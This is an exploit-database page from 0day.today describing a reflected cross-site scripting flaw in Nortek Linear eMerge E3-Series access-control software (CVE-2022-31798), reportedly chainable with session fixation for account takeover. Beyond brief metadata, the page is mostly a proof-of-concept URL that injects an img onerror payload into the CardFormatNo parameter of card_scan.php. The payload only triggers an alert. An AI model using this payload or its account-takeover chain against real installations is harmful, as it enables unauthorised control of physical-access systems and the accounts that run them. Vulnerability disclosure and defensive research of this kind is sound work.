[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nortek Linear eMerge E3-Series Account Takeover XSS Vulnerability

Author
Omar Hashim
Risk
[
Security Risk High
]
0day-ID
0day-ID-37899
Category
web applications
Date add
08-08-2022
CVE
CVE-2022-31798
Platform
php
# Exploit Title: Nortek Linear eMerge E3-Series - Account Take Over
# Exploit Author: Omar Hashim
# Version: 0.32-07p
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE: CVE-2022-31798

# Description
 ====================
There is local session fixation that chained with reflected cross-site
scripting leads to account take over of admin or less privileged users

# Proof Of Concept:
 ====================
http://<HOST:PORT>/card_scan.php?No=1337&ReaderNo=1337&CardFormatNo=<img
src=x onerror=alert(document.location)>

#  0day.today [2024-10-06]  #